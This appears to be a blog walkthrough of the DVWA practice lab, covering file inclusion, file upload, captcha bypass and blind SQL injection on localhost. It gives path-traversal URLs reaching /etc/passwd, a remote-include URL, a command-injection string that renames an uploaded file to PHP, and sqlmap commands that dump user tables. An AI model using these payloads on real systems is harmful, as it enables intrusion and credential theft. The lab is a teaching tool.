DVWA - Part 2
This is the second part exploring DVWA. For the first part, click here.
In this post, we will see vulnerabilities for:
- File inclusion
- File upload
- Captcha
- SQL
File inclusion
This happens in dynamic pages with PHP as a result of a fault in the programming of the page. This is why the attacker could modify some files and parameters.
LOW - MEDIUM - HIGH:
LOW:
- https://127.0.0.1/DVWA/vulnerabilities/fi/?page=file4.php
- https://127.0.0.1/DVWA/vulnerabilities/fi/?page=../../robots.txt
- https://127.0.0.1/DVWA/vulnerabilities/fi/?page=../../phpinfo.php
- https://127.0.0.1/DVWA/vulnerabilities/fi/?page=../../bootmgr
- https://127.0.0.1/DVWA/vulnerabilities/fi/?page=../../../../../../etc/passwd
- http://127.0.0.1/DVWA/vulnerabilities/fi/?page=http://127.0.0.1/evilphp.php
MEDIUM: We can’t use ../, so change it to …/./ :
- https://127.0.0.1/DVWA/vulnerabilities/fi/?page=…/./…/./robots.txt
HIGH: Try to use this:
- https://127.0.0.1/DVWA/vulnerabilities/fi/?page=file:///var/www/html/DVWA/robots.txt
File upload
You can encapsulate malicious code in inert file types.
LOW - MEDIUM - HIGH:
- LOW: Upload a malicious file.
- MEDIUM: Send a POST Request with the malicious file and change the Content-Type to image/jpeg.
- HIGH: Change the malicious file extension to jpeg and change the file signature to jpeg signature with hexedit. Then, in the command injection section, write this:
127.0.0.1|mv ../../hackable/uploads/test.png ../../hackable/uploads/test.phpInsecure Captcha
Captchas are generally used to prevent robots from performing an action instead of humans.
LOW - MEDIUM - HIGH:
LOW: Change the step=1 to step=2.
http://127.0.0.1/DVWA/vulnerabilities/captcha/?step=2&password_new=q&password_conf=q&Change=Change
MEDIUM: We need to change the passed_captcha to True.
http://127.0.0.1/DVWA/vulnerabilities/captcha/?step=2&password_new=q&password_conf=q&passed_captcha=true&Change=Change
HIGH: Change the User-Agent to reCAPTCHA.
http://127.0.0.1/DVWA/vulnerabilities/captcha/?step=1&password_new=123&password_conf=123&recaptcha_response_field=hidd3n_valu3&Change=Change
SQL injection blind
It is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response.
LOW - MEDIUM - HIGH:
LOW: Using wordlists or by hand only we can get the same message: “we find this user id in ddbb”. For this reason, we will use sqlmap tool.
sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/?id=1+or+sleep%28__TIME__%29%23&Submit=Submit" --cookie="security=low; PHPSESSID=b8jch8ondgrdoikuq5ap78ci7n" –dbs
sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/?id=1+or+sleep%28__TIME__%29%23&Submit=Submit" --cookie="security=low; PHPSESSID=b8jch8ondgrdoikuq5ap78ci7n" -D dvwa –tables
sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/?id=1+or+sleep%28__TIME__%29%23&Submit=Submit" --cookie="security=low; PHPSESSID=b8jch8ondgrdoikuq5ap78ci7n" -D dvwa -T users –dump
MEDIUM:
sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/" --cookie="security=medium; PHPSESSID=b8jch8ondgrdoikuq5ap78ci7n" --data="id=3&Submit=Submit" --dbs
//OPTION 2:
sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/?id=3&Submit=Submit" --cookie="security=medium; PHPSESSID=b8jch8ondgrdoikuq5ap78ci7n" –dbs
//and you have to follow the same steps as low level
HIGH:
- Referer: https://127.0.0.1/DVWA/vulnerabilities/sqli_blind/cookie-input.php
- Cookie: id=1%27; security=high; PHPSESSID=b8jch8ondgrdoikuq5ap78ci7n
- Data: id=1%27&Submit=Submit
sqlmap -u “http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/?id=1%27&Submit=Submit” --cookie=”security=high; PHPSESSID=b8jch8ondgrdoikuq5ap78ci7n” --dbs //and you have to follow the same steps as low level
